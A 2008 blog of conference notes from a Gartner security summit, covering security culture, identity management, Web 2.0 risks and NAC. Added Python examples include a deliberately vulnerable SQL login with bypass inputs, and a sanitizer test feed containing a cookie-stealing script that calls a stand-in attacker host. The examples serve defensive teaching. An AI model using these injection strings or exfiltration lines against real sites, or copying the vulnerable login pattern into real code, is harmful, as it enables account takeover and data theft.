Thursday, 2 October 2008

Magic Quadrant and the Colour of Security

This post combines feedback from the last two sessions of the conference. The first session was an explanation of the famous Gartner "Magic Quadrant", and during this session they exploded a few myths.

Magic Quadrants

Every vendor in the diagram is a worthy alternative; it depends on what you need from the product. If you have a niche need, then a niche product may be perfectly appropriate, but don't expect to make a purchase decision just by looking at the diagram, nor even by looking at the diagram and reading the analysis. Instead, look at the diagram, read the analysis and then speak to an analyst: through that last step, the analyst will sometimes suggest vendors that didn't meet the criteria for inclusion in the report but are more appropriate to us than the vendors listed.

Magic quadrant diagrams are only produced for markets that have reached a certain maturity, so the inclusion of a vendor on a diagram tells us not only about their place in the market but about the maturity of the market as a whole. Sometimes magic quadrant reports get combined over time as markets become less siloed and products more integrated. We need to keep an eye on acquisitions ourselves, as diagrams are not updated specially to reflect events, only yearly on a schedule.

The Colour of Security

This session took the form of a panel discussion which asked two questions:

  1. Will business systems be more or less secure in ten years time?
  2. Will there be a separate IT security function in ten years or will it have become wholly integrated into IT operations?


 

                               Less Secure            More Secure
Separate IT Security Function  Perpetual Arms Race    Security Nirvana
No Security Function           Chaos                  Software Engineering
The above grid was revealed to us after the final vote. Clearly, the descriptions are for the extremes, whereas reality is likely to be less clear cut (when is reality ever clear cut?).

Perpetual Arms Race: if there remains a separate IT security organisation yet we are less secure, more and more will move to IT operations (as is happening with anti-virus and anti-malware now), but there will always be new threats to be mitigated and IT security experts to mitigate them.

Chaos: if IT security organisations are operationalised and yet we are less secure, the world will descend into chaos (or at least towards it).

Security Nirvana: if IT security professionals maintain a separate function, but the world is more secure, then their world (and ours) will be a better place.

Software Engineering: if we end up more secure, yet there is no separate IT security function, it will be because we have solved the problems of IT security through software engineering.

When an American audience was asked to vote before the debate, they predicted security nirvana; after the debate, they predicted an arms race. We, the European audience, predicted the arms race immediately and stuck with that prediction after the debate.

The arguments are these:

  1. IT security products are almost wholly reactive, so we will always be on the back foot: preparing for the most recently discovered attack, but never predicting the next one (and adequately defending against it).
  2. Ross Anderson (www.ross-anderson.com), who spoke the previous day, indicated that security vulnerability in emerging technologies is virtually an economic certainty: only when markets mature can vendors afford to get security right (look at Windows, look at the internet).
  3. Attackers are becoming professional, and are in it for the money, not the fame, which means their priorities are different. TJ Maxx (TK Maxx to us) was breached months before they realised, and it was even longer before their customers were told. This particular point kept me thinking: how many other institutions have been breached already and simply haven't found out yet…

Separate from my blog, I am developing a slide deck that I will post when it's ready highlighting my feedback from the conference.

Information Security Audits as an Accepted Business Support Tool at Novartis

Potemkin villages are what you get when you announce information security audits, because people can't afford to be on the receiving end of "critical audit findings". "Audits are of little use for the management to steer a company and manage risks." Audit preparation is not sustainable. People feel threatened by audits, and don't see them as risk management techniques.

  • Make the assessment selection process transparent
  • Make the conclusions transparent
  • Make it a shared decision and assessment process
  • Don't blame anybody for risks found in an assessment

Wednesday, 1 October 2008

Communities of Trust Case Studies

What we do is dependent on us being able to share data with people outside the organisation—how can we do that safely in a "community of trust"? What risks are introduced through the extended enterprise?

The greater the degree of separation, the greater the difficulty of evaluating risk. How willing is your organisation to accept risk from unmanaged PCs and non-employees?

Trust reduction factors:

  • Greater distance
  • Different organisations
  • Cultural diversity
  • Multiple jurisdictions
  • Incompatible technologies

The less you know about something, the riskier you must assume that it is.

A Community of Trust offers:

  • Assurance that you know with whom you are dealing
  • Confidence that information has not been manipulated
  • Expectation that sensitive information will not leak

The line of business decides how to use the technology that is provided by IT.

Call to action:

  • Re-evaluate your current outsourcing and partnering risks.
  • Move controls up the stack to application and data layers.
  • Put controls on endpoints where the data is used.
  • Use discretionary controls and logging and move towards mandatory controls—ultimately, automated controls.

SANS Institute Workshop: Frontline Solutions for Security Professionals

This is a longer session than all the others, and I hope it will take us to a greater depth of understanding of some of the issues. The speaker is a trainer by profession, so the flavour of this posting might be different from the others. Again, SQL injection and cross-site scripting are the two most common attacks.

The talk was longer than it needed to be (ah well) and covered much of the same ground as the other talk by the same presenter. However, he did give a demonstration of a SQL injection attack used to get past a bank's credential logon screen, as well as an attacker's toolkit product that he recommended we use to determine what vulnerabilities our own systems might have against the black-hat use of the same techniques.
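The speaker's demonstration is not reproduced in these notes. As an added example (not the speaker's code), here is the pattern a logon-bypass injection exploits and the fix, using Python's built-in sqlite3 module. The account names, passwords and the two table layouts are constructed for the example; the legacy table mimics the plaintext-password, string-concatenation logon that such demonstrations break.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample accounts (not from the talk).
SAMPLE_ACCOUNTS = [("alice", "correct horse"), ("admin", "hunter2")]


def _derive(password, salt):
    # PBKDF2-HMAC-SHA256; the iteration count is kept modest so the demo runs quickly.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


def make_db():
    """In-memory database with two account tables.

    legacy_users keeps plaintext passwords and is queried by string
    concatenation (the pattern the demonstration exploited); users keeps
    salted PBKDF2 hashes and is queried with bound parameters.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE legacy_users (name TEXT PRIMARY KEY, password TEXT)")
    conn.execute("CREATE TABLE users (name TEXT PRIMARY KEY, salt BLOB, pwhash BLOB)")
    for name, password in SAMPLE_ACCOUNTS:
        conn.execute("INSERT INTO legacy_users VALUES (?, ?)", (name, password))
        salt = os.urandom(16)
        conn.execute("INSERT INTO users VALUES (?, ?, ?)", (name, salt, _derive(password, salt)))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The flawed pattern: user input is pasted into the SQL text.

    Username  admin' --  turns the statement into
      SELECT name FROM legacy_users WHERE name = 'admin' --' AND password = '...'
    so the password clause is commented out and the check passes.
    """
    sql = ("SELECT name FROM legacy_users WHERE name = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_hardened(conn, username, password):
    """Bound parameters keep the input as data, and the password is never
    compared inside SQL: the stored hash is recomputed and compared in
    constant time. An unknown user still costs one derivation, so timing
    does not reveal which names exist."""
    row = conn.execute(
        "SELECT salt, pwhash FROM users WHERE name = ?", (username,)
    ).fetchone()
    if row is None:
        _derive(password, b"\0" * 16)
        return False
    salt, stored = row
    return hmac.compare_digest(_derive(password, salt), stored)


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("admin", "hunter2"), ("admin' --", "anything")]:
        print(repr(user), "legacy:", login_vulnerable(db, user, pw),
              "hardened:", login_hardened(db, user, pw))
```

The two inputs worth trying are `admin' --` (targets a known account and comments out the password clause) and `' OR '1'='1` in both fields (makes the WHERE clause true for every row); the parameterised version treats both as literal usernames that do not exist.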


 

Security in the Age of Web 2.0

You will be exposed to Web 2.0 insecurities, no matter what.

Web 2.0: User-Centric (user as developer); distributed; open (and open source); lightweight (user friendly)

  • What makes Web 2.0 applications insecure?
  • What technologies and practices will secure Web 2.0?

Ajax, LAMP, SOAP: lightweight. It is not the webmaster that selects content; there is no project manager, no network administrator, no DBA, no business analyst defining the taxonomy. The results are risky for us, and for banks, businesses…

Availability of resources—those resources that we can use to analyse our applications (SAST and DAST) can be used by attackers as well (which means it is even more important that we use them).

Openness and collaboration as a threat: deep linking, mashups, RSS, iFrames. These things are a threat to advertising revenues (as it is the main web pages that carry the advertising).

SOA as a threat: reusable services mean reusable security vulnerabilities. WSDL and UDDI disclose information to attackers. Legacy systems exposed through SOA face new (web) types of attack.

SWOT for Web 2.0 Application Security

Strengths

  • Good-enough technology
  • Increasing awareness
  • Pressure from Government and regulators

Weaknesses

  • Users less mature than tools
  • No developer responsibility
  • Misconceptions about:
    • Inward-facing apps
    • The role of QA being separate from security assurance
    • Network security being a replacement for defence in depth

Threats

  • Dual purpose technologies
  • Changing nature of attacks (from massive to targeted)
  • Hackers industry
  • Extreme openness, collaboration

Opportunities

  • Security solutions span over application lifecycle
  • Security built into applications
  • Evolution towards Security 3.0 (application security, separate from network security)


The speaker recommends tactical acquisition of DAST and SAST; these technologies are not likely to disappear. Check the slide deck for the hype curve and the list of DAST and SAST vendors. We need to look into monitors and scanners for DBMS, network and application.

Do software composition analysis: validate the IP of components; validate the security and functionality of patches; validate releases. Black Duck and Palamida are the vendors named.

Mashups: Validate all input; examine license compliance; filter content presented to customers; formalize SLAs with third parties; expect abuse in unpredictable ways; prepare for HTML/XML screen scraping and iFrames.
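As an added example, not from the presentation, an allow-list filter for third-party content of the kind a mashup page embeds, using only Python's standard library. The tag and attribute allow-list, the permitted URL schemes and the sample feed item are assumptions for the example. The design point is to rebuild the output from an allow-list rather than strip known-bad patterns: script and iframe content is dropped wholesale, event-handler attributes never make it through because they are not listed, and text is re-escaped on the way out. In production a maintained sanitiser library is the right choice; this shows the approach it implements.

```python
from html import escape
from html.parser import HTMLParser

# Allow-list for third-party content (an assumption for this example).
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
# Elements whose contents must go too, not just the tag itself.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript"}
SAFE_SCHEMES = ("http://", "https://", "mailto:")


def safe_href(url):
    """Accept absolute http(s)/mailto links and site-relative paths only;
    javascript:, data:, vbscript: and protocol-relative //host URLs are rejected."""
    u = url.strip().lower()
    if u.startswith(SAFE_SCHEMES):
        return True
    return u.startswith("/") and not u.startswith("//")


class AllowListSanitizer(HTMLParser):
    """Rebuilds the markup from scratch: only allow-listed tags and attributes
    are re-emitted, text is re-escaped, comments are dropped, and anything
    inside a script/iframe-style element is dropped along with it."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside an element from DROP_WITH_CONTENT

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        pieces = []
        for name, value in attrs:
            if value is None or name not in ALLOWED_ATTRS.get(tag, ()):
                continue
            if name == "href" and not safe_href(value):
                continue
            pieces.append(' %s="%s"' % (name, escape(value, quote=True)))
        if tag == "a":
            pieces.append(' rel="nofollow"')  # third-party links never pass on our reputation
        self.out.append("<%s%s>" % (tag, "".join(pieces)))

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments (including conditional comments) are never re-emitted


def sanitize(markup):
    parser = AllowListSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)


# Constructed sample of a hostile third-party feed item.
SAMPLE_FEED = (
    '<p onclick="steal()">Hello <b>world</b> '
    '<a href="javascript:alert(1)">x</a> '
    '<a href="https://example.org/?a=1&amp;b=2">ok</a></p>'
    '<script>document.location="http://evil.invalid/?c="+document.cookie</script>'
    '<iframe src="http://evil.invalid/"></iframe>'
    '<img src=x onerror="alert(1)">&lt;tag&gt;'
)

if __name__ == "__main__":
    print(sanitize(SAMPLE_FEED))
```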

Tuesday, 30 September 2008

Creating an Effective Security and Risk Management Culture

Superheroes are not here to prevent things from happening—we can't afford to be drawn to a superhero model with respect to security and risk management. The alternative is to have a mandate from the top and to earn the trust of the organisation as a whole.

The head of security must be:

  • Never considered an obstacle
  • Consulted by business
  • Someone who listens
  • Knows how the company makes money

Even better:

  • Considered an added value
  • Advice is sought out
  • Board/CEO reads report
  • Integral to IT planning

Must understand constraints on activity:

  • Regulations: External/Internal [effectiveness of rules is a function of organizational culture]
  • Cultural Proclivity [effectiveness of rules is a function of organizational culture]
  • Market Forces [if it affects the bottom line, it will automatically become a priority]
  • Technical Possibilities [functions in spite of control subject]

How many security officers does it take to make an enterprise secure? Just one… but the enterprise must want to be secure. Awareness, willingness, ability: this is the natural logical progression as we raise security awareness.

Can we come up with a form based on the service catalogue and get numbers for the level of confidentiality, integrity and availability needed for each of those systems? We need to make sure that data owners assess the criticality of their own data and explicitly accept the associated risks.

Key message is that business owners own the risk, not us. They might delegate to us the actions to reduce risk, but we don't own the risk for them. Work with business owners to determine risks, and make sure they understand the residual risk that remains after we have performed agreed actions.

Sales Pitches

I have blogged something about some of the vendors at the conference, but put it on my Sharepoint blog for the sake of security...
http://cis-netsps03.lancs.ac.uk:28921/personal/meikle/Blog/default.aspx

The Future of Database Security

Hmmm… Too much that is relevant here, so my comments going into e-mail. Drop me a line if you want to know what my thoughts were.

The Identity and Access Management Scenario

Note: there is a separate Identity and Access Management Summit.

A set of processes and technologies to manage:

  • Users' digital identities
  • The relationship to civil identity
  • Users' access to systems and the information they contain

Identity: user lifecycle management. Access model: role life cycle management. Identity lifecycle consumes roles from access model. Workflow that passes roles to user lifecycle has a lifecycle itself. All this is done to reduce risk (how does the security framework affect the workflows).
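An added example, not from the speaker: a toy model of an identity lifecycle that consumes roles from an access model. The role names and entitlements are assumptions for the example. The point it shows is that a mover must replace roles rather than accumulate them (otherwise a lecturer who moves to finance keeps grade-writing access), and that entitlements handed out outside the role model are exactly what a recertification review has to find.

```python
from dataclasses import dataclass, field

# Constructed access model: roles map to the entitlements they carry.
# The identity lifecycle only assigns roles; it never grants entitlements directly.
ROLE_ENTITLEMENTS = {
    "applicant": {"portal:apply"},
    "student": {"portal:student", "vle:read", "email", "library"},
    "lecturer": {"vle:read", "vle:write", "grades:write", "email", "library"},
    "finance": {"email", "ledger:write"},
}


@dataclass
class Identity:
    name: str
    roles: set = field(default_factory=set)
    exceptions: set = field(default_factory=set)  # grants made outside the role model
    active: bool = True


def effective_access(ident):
    """Entitlements the person holds right now."""
    if not ident.active:
        return set()
    access = set(ident.exceptions)
    for role in ident.roles:
        access |= ROLE_ENTITLEMENTS[role]
    return access


def joiner(directory, name, role):
    directory[name] = Identity(name, roles={role})


def mover(directory, name, new_role):
    """A mover replaces the role set. Adding the new role on top of the old
    one is how privilege accumulates over a career."""
    directory[name].roles = {new_role}


def leaver(directory, name):
    ident = directory[name]
    ident.active = False
    ident.roles.clear()
    ident.exceptions.clear()


def audit_exceptions(directory):
    """Entitlements held by active identities that no assigned role explains."""
    report = {}
    for ident in directory.values():
        if not ident.active:
            continue
        covered = set()
        for role in ident.roles:
            covered |= ROLE_ENTITLEMENTS[role]
        stray = ident.exceptions - covered
        if stray:
            report[ident.name] = sorted(stray)
    return report


def run_scenario():
    """Walk one person from applicant to student to leaver and another from
    lecturer to finance; return the directory and the access seen at each step."""
    directory = {}
    trail = []
    joiner(directory, "amy", "applicant")
    trail.append(("amy", "applicant", effective_access(directory["amy"])))
    mover(directory, "amy", "student")
    trail.append(("amy", "student", effective_access(directory["amy"])))
    joiner(directory, "bob", "lecturer")
    mover(directory, "bob", "finance")
    trail.append(("bob", "finance", effective_access(directory["bob"])))
    directory["bob"].exceptions.add("grades:write")  # an out-of-band grant that bypassed the model
    leaver(directory, "amy")
    trail.append(("amy", "left", effective_access(directory["amy"])))
    return directory, trail


if __name__ == "__main__":
    directory, trail = run_scenario()
    for name, stage, access in trail:
        print(name, stage, sorted(access))
    print("exceptions to review:", audit_exceptions(directory))
```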

Security efficiency; security effectiveness; business enablement.

Interesting that, when talking about the value of IAM, the first thing the speaker mentioned was attracting and retaining customers—that is exactly what we're doing when we use UIM to help with PGA.

Value:

  • Attract and retain customers
  • Improve critical business processes and workflows
  • Maximise performance and profitability

IAM Program Maturity

Non-existent  Initial  Developing  Defined  Managed  Optimizing
4%            10%      40%         28%      15%      4%

This does indicate the importance of process definition before applying IAM to that process. We need to work out what process definition we need to do for students during the registration process (and during the application process) to give them the access they need.

Controlling Unauthorized Network Access in a Large Organization

Deploying NAC at Nottingham City Council, with Sophos. They chose Sophos because they already had their AV. Interesting that yesterday we were encouraged to push back on the cost of AV, and to threaten to pull out our existing AV if we don't get a cut in price.

Very little detail in this presentation. It does remind me that NAC is not an enforcement technology. The questions from the audience reflected the issues of NAC for a variety of roles (visitors, parent companies etc.) and multiple platforms (Linux and Mac not supported by Sophos).

Protecting Business in a Web 2.0 World

The signature approach to malware is running out of steam, so what should replace that paradigm? There has been a massive increase in the number of unique malware samples. There are now programs that generate malware (so there are many variants).

Mmmm. This has turned into a brief history of SaaS and a sales pitch for security SaaS…

Managing Legacy Content to Decrease IT Costs and Reduce Business Risks

Our default, as we look at our e-mail, is "I'll keep it just in case." Keeping everything is expensive, and most of what we keep we don't need to. Data storage needs are going up by about 50% per year (without taking into account pictures, audio and video). No one has responsibility for information retention management. How do we manage the costs of undisciplined data retention? Retention schedules cannot be implemented (because no one has the responsibility).

Suggestions:

  • Give legal training to IT people so that they can argue with the lawyers over what can be thrown away
  • Hire data archivists (directly, not as consultants) who can make decisions about what to keep and what to discard

Information value degrades over time—rarely does it maintain value. After the first month of e-mail archiving, archives are rarely hit. There are certain things that you should keep—but it is the exception, not the rule.

Five Myths about Rising Storage Demand:

  1. It can be offset by better technology
  2. It can be offset by paying less
  3. It can be offset with more storage tiers
  4. It can be satisfied with more tape
  5. It can be accommodated with archiving software

Determine TCO for storage and react.

Use automated methods to determine what files can be thrown away. Determine a set of rules that can help build a list of what could be thrown away.

How does this stuff affect us? For students, I assume that people's home directories aren't kept in perpetuity. For their submissions, how long do they need to be kept—do we want to keep them forever? For e-mail, for staff H: drives, we need to work out what can be stored forever and what can't. What's worse: not giving people lots of central storage so that things get lost on C: drives, or giving them lots of central storage and having capacity requirements go up and up…?

Monday, 29 September 2008

Latest Trends in Computer Hacking

This presentation is given by Jess Garcia, of SANS.

Hacking activities have changed over the last three years or so.

  • Dec-07: sophisticated Trojan loots business bank accounts.
  • Jan-08: bank Trojan charges for sex, breaks two-factor authentication.

Botnets are being used differently now—they are the basis for more than just Denial of service attacks.

Attackers now attack the security software itself and then obfuscate what has happened.

Another reason why we should patch immediately: by the speaker's figures, 85% of the time there are now exploits released the same day as the patches for the vulnerabilities, up from 18% in 2004. No longer are the attackers teenage computer experts; now they are professional cyber-criminals (hired by criminal gangs, or, if they are teenagers, they have been kidnapped by the gangs and threatened). Rather than being motivated by prestige and curiosity, they are motivated by money.

Top Threats 2008:

  • Client side: Browser Plugin Attacks
  • Web Apps (51% of all vulnerabilities): SQL Injection and cross-site scripting
  • Virtualization—this seems to be a growing area
  • Malware
    • Trojan Bankers
    • Botnets

Haydan is a tool that can be used to create a payload with the desired MD5 hash… which makes hashes much harder to trust. (Note that what is practical against MD5 is a collision, two different inputs that the attacker constructs together so that they share a hash, rather than matching an arbitrary hash that someone else chose; that is still enough to break MD5 as a tamper check, because the attacker can prepare both versions of a file in advance.)
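An added example, not the tool the speaker named: the two inputs from the 2004 MD5 collision published by Wang et al. (reproduced from the public literature, for instance the Wikipedia article on MD5), checked with Python's hashlib. It shows that the MD5 digests agree, that SHA-256 still tells the inputs apart, and that the collision survives any common suffix, which is the property that turns two colliding blocks into two colliding files. The helper functions and the report are added code.

```python
import hashlib

# Two 128-byte inputs published by Wang et al. (2004). They differ in six
# bytes yet share an MD5 digest. Published data, not constructed here.
BLOCK_A = bytes.fromhex(
    "d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f89"
    "55ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5b"
    "d8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0"
    "e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70"
)
BLOCK_B = bytes.fromhex(
    "d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f89"
    "55ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5b"
    "d8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0"
    "e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70"
)


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def differing_offsets(a, b):
    """Byte positions at which two equal-length inputs differ."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


def same_md5_after_suffix(a, b, suffix):
    """MD5 is a Merkle-Damgard construction: once two inputs have driven the
    internal state to the same value, appending the same suffix to both keeps
    the digests equal. A colliding pair of headers therefore yields colliding
    files whatever content follows."""
    return md5_hex(a + suffix) == md5_hex(b + suffix)


def collision_report():
    """Summarise the collision and the checks a verifier could still rely on."""
    return {
        "differing_offsets": differing_offsets(BLOCK_A, BLOCK_B),
        "md5_a": md5_hex(BLOCK_A),
        "md5_b": md5_hex(BLOCK_B),
        "sha256_a": sha256_hex(BLOCK_A),
        "sha256_b": sha256_hex(BLOCK_B),
        "md5_collides_with_suffix": same_md5_after_suffix(BLOCK_A, BLOCK_B, b"same trailer"),
    }


if __name__ == "__main__":
    for key, value in collision_report().items():
        print(key, value)
```

The practical consequence for us: an MD5 checksum on a download page proves nothing against a supplier (or anyone upstream of the supplier) who can choose both versions of a file; publish SHA-256 digests and, better, sign them.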

Malice, Misuse or Mistake: Getting to the "root" of the problem

This presentation seemed to suffer the same issue that I saw in vendor presentations in Barcelona: everything seemed to revolve around selling rather than imparting information; the speaker's motivation was different from ours. Little to say really, other than that we should try to follow the principle of least privilege, but nothing about how much harder that might be as we try to break down data silos and provide new views on data across multiple databases, and no strategies for managing those new problems… ah well.

Security of Big Applications, Legacies, Databases and Vendors

There is a key need for Dynamic Application Security Testing (DAST) and Static Application Security Testing (SAST). They will help us to ensure that the applications we buy or develop are secure. I had my 1-on-1 with the speaker at lunchtime. He suggests that we should be asking vendors what kinds of analysis they have performed on their code. We should expect the analysis tools we use alongside code development to be deeply integrated with Visual Studio.

There is a growing body of threats to database applications via their web interfaces. We should look at data obfuscation technologies to help us with testing, and for the case where vendors ask us to send them databases for debugging (something we won't do now). Vendors: Applimation, DCR, Compuware, Camouflage, IBM, Oracle.

"Legacy application is any application that really works." i.e., as soon as an application goes live, it is legacy. As soon as we take our eye off the ball, we're not working on an application, it becomes legacy. Legacy understanding is key to legacy security. Use dynamic and static analysis to collect information on legacy, and determine what needs to be done to secure our legacy systems.

Consider a quadrant picture with two axes: application business value against application technical quality.

Application technical quality (increasing upwards)
  ^
  |   Tolerate                    Integrate
  |   (re-evaluate/reposition)    (maintain/evolve)
  |
  |   Eliminate                   Migrate
  |   (retire/consolidate)        (modernize/re-engineer)
  +------------------------------------------------------>
      Application business value (increasing to the right)
      low value: a successful     high value: a successful
      attack is low harm          attack is high harm

Open source SAST and DAST technologies are being used by attackers to find vulnerabilities in applications, which they can then exploit. We need to ensure we understand what the attackers understand about our applications.

We should be using tools through all phases of application development to ensure we develop secure applications. Need to look at the speaker's Gartner publications for more direction.

DNS

Spent some time over lunch talking to DNS. We discussed Self-Service Password Reset (SSPR). They indicated the following:

  1. If you get password convergence, the use of SSPR reduces, as people have only one password to remember
  2. People feel a stronger ownership of their password when they have only one (it is their password, not the Windows password or the e-mail password or VLE password). That stronger ownership leads to them keeping their password more secure.
  3. When there is password convergence, people are less likely to share their password, as that password gives access to their e-mail.
  4. They have implemented SSPR but use up to twelve questions to identify someone, and let the end-user determine the questions that they would be asked. They do not recommend we try that in the university as they would probably go with "Q1", "Q2" for the questions and "yes" for all the answers.

The Mark One Human Being

Recent security breaches:

  • Nationwide fined £980,000 for stolen laptop.
  • HMRC lost two CDs of child support data
  • Bank customer data sold on eBay
  • Secret terror file left on train
  • Royal Navy laptop stolen with 600,000 people's details…

66% of companies increased IT security spending in 2007, but still these events continue.

40% provide ongoing security awareness training to staff—i.e. 60% do not.

If we don't teach people what they need to know about security, we will not be able to make the university's data more secure. We need to make security education and awareness a key part of our information security strategy. It is not enough to tell people that security is their responsibility. Consider how we market information security awareness to ensure that the message gets across.

Once the communication is out, measure whether there is a change in behaviour. Policy compliance, and survey results are used to inform the following year's approach.

If we put the technology in place but do not market and communicate the programme so that individuals understand and fulfil their responsibilities, the investments we make will be worthless and security breaches will happen; meanwhile our support for investment in security will wane.

Conference Opening and Building a Real-Time Adaptive Security Infrastructure

Speakers: Jay Heiser; Tom Scholtz; Neil MacDonald.

Coming up later this week:

  • Ross Anderson—professor of Security Engineering, University of Cambridge Computer Laboratory--speaks tomorrow and has written a book called "Security Engineering".
  • Peter Hustinx, European Data Protection Supervisor—strategic issues for data protection in Europe.
  • Best practice workshops: SANS; ISACA.

Adaptive Security Infrastructure: Neil MacDonald discussing how information security must become adaptive, both to changing threats and to changing business needs. At the moment information security is not keeping up: too many point products, with too much complexity; products are too expensive and vendors are not investing enough. Network, endpoint, application and content security are all separate and don't talk to each other. We need to switch from "zero risk" to "managed risk".

Implications for security as we virtualize hardware, operating system and applications; data from applications is abstracted through web services. Then there are portable personalities, EC2 (Amazon) etc etc...

The current model is flawed: there is no "us" and "them". Every device, every packet, all content, every user is a risk. The implication is that the notion of the "perimeter" is less important; security and trust are no longer binary; we need to think about "relative trustability". Rather than just one "perimeter" there will be multiple. Look to survival of the system: protect workloads and information, not endpoints.


In the layered diagram shown: at the bottom, firewalls and application control; in the middle, anti-virus, anti-spam and URL filtering; at the top, looking at behaviour. The layers communicate with each other.

Service Modeling Language (SML) is going to be used to build security models (amongst other things) at the point that applications are written (to be announced by Microsoft at TechEd as project "Oslo"). Seems like the next generation of the Dynamic Systems Initiative. The model describes the role(s) that should be able to perform particular functions within the application.

Mobility and Security Management Cycle

Security requires management, management requires security.

Cycle: Manage-Secure-Defend-Budget-Specify-Configure

  • How does mobility affect the challenge of management and security?
  • What are the key implementation decisions to security and management?

Management becomes more difficult when personal devices must be managed and secured (makes me think of devices bought by departments and faculties).

Each platform requires its own infrastructure for security and management: Blackberry, Windows Mobile, PC, personal PC, Nokia… But if we restrict platform support, people forward mail from the managed device to a personal account, and then what happens to the security?

Recommendations: apply security policy at the point that a device is provisioned. Change management should check whether the device is within compliance. As issues are solved, move them out of the responsibilities of the security group: those problems are solved, and the security group needs to look constantly to the future. Network access control; VPN; patch management; local data encryption; port/peripheral usage control; firewall; anti-spyware; anti-virus. For us, many of these things are rightly handled by "operations", but maybe we need to look at the others.

  • What are the inherent weaknesses of the device?
  • What default measures will strengthen device security?
  • What exposures are caused by the way the device is used?
  • What security measures and user practices will reduce exposure?
  • Can the device configuration be monitored or controlled?
  • Will good management reduce operations and support costs as well as improve security?

Consider that all the above questions need to be asked for each type of device that we use…

We may be at odds with users' requirements in ensuring security. It is interesting that the speaker says we don't have time to evaluate Windows updates before we apply them; we should just accept the risk of deploying straight away. Not worth using EFS unless you follow best practices, otherwise it is too easy to break. Encryption and strong authentication are much better than remote lockdown/erase for mobile devices.

Securing wifi is going to be a big problem moving forward: too many different kinds of devices.

  • Trusted devices: corporate-issued, fully controlled (ISS-managed PCs)
  • Tolerated devices: limited to safe interactions
  • Unwanted devices: uncontrolled, unmanaged
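An added example, not from the session: a small posture check that places constructed device records into those three tiers, of the kind a NAC or provisioning step would run. The device attributes, the control thresholds and the network assigned to each tier are assumptions for the example. The design point is that an unmanaged device's self-reported state cannot be verified, so it is classified as unwanted whatever it claims; a managed corporate device only earns "trusted" while every listed control is in place.

```python
from dataclasses import dataclass
from datetime import date


# Constructed device record (an assumption for this example).
@dataclass(frozen=True)
class Device:
    name: str
    owner: str           # "corporate", "contractor" or "employee"
    managed: bool        # enrolled in our inventory/patch/anti-malware tooling
    encrypted: bool
    anti_malware: bool
    remote_wipe: bool
    last_patched: date


# Where each tier is allowed to connect (assumed for the example).
TIER_NETWORK = {"trusted": "corporate", "tolerated": "restricted", "unwanted": "guest"}
MAX_PATCH_AGE_DAYS = 30


def posture_findings(dev, today):
    """Controls the device fails. An unmanaged device fails outright: its
    encryption, anti-malware and patch state are self-reported and unverifiable."""
    if not dev.managed:
        return ["unmanaged: inventory, patch, anti-malware and encryption state unverifiable"]
    findings = []
    if not dev.encrypted:
        findings.append("no local data encryption")
    if not dev.anti_malware:
        findings.append("no anti-malware")
    if not dev.remote_wipe:
        findings.append("no remote lock/wipe")
    if (today - dev.last_patched).days > MAX_PATCH_AGE_DAYS:
        findings.append("patches older than %d days" % MAX_PATCH_AGE_DAYS)
    return findings


def classify(dev, today):
    """Return (tier, network, findings) for one device."""
    findings = posture_findings(dev, today)
    if not dev.managed:
        tier = "unwanted"
    elif dev.owner == "corporate" and not findings:
        tier = "trusted"
    else:
        tier = "tolerated"   # managed but not corporate, or corporate with a gap
    return tier, TIER_NETWORK[tier], findings


def triage(inventory, today):
    return {dev.name: classify(dev, today) for dev in inventory}


# Constructed inventory and reference date for the example.
TODAY = date(2008, 9, 29)
SAMPLE_INVENTORY = [
    Device("lib-desk-01", "corporate", True, True, True, True, date(2008, 9, 25)),
    Device("cfo-laptop", "corporate", True, True, True, True, date(2008, 7, 1)),
    Device("contractor-pc", "contractor", True, True, True, False, date(2008, 9, 26)),
    Device("byo-iphone", "employee", False, True, False, False, date(2008, 9, 1)),
]


def triage_sample():
    return triage(SAMPLE_INVENTORY, TODAY)


if __name__ == "__main__":
    for name, (tier, network, findings) in triage_sample().items():
        print("%-14s %-9s -> %-10s %s" % (name, tier, network, "; ".join(findings) or "ok"))
```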

The speaker used this grid to show that there is a landscape of issues, and that we must look to converge on solutions that cover multiple areas of the grid, though there are different strategies for doing that. I think we would benefit from building a list of devices appropriate to the institution and determining how we are approaching the different areas of concern versus how we ought to approach them.

 

Grid columns (controls): Encryption; lock/wipe; backup/restore; inventory & audit; patch update; software distribution; anti-malware; VPN; user authentication.
Grid rows (device types): Company desktop; Company notebook; Windows Mobile; Contractor PC; Employee notebook; Portable personality; iPhone; Blackberry.
(The cell markings of the grid did not survive into these notes.)

Sunday, 28 September 2008

Introduction

I am attending Gartner's Security Summit in London at the Royal Lancaster Hotel. This blog will contain my notes from the various sessions I will attend.

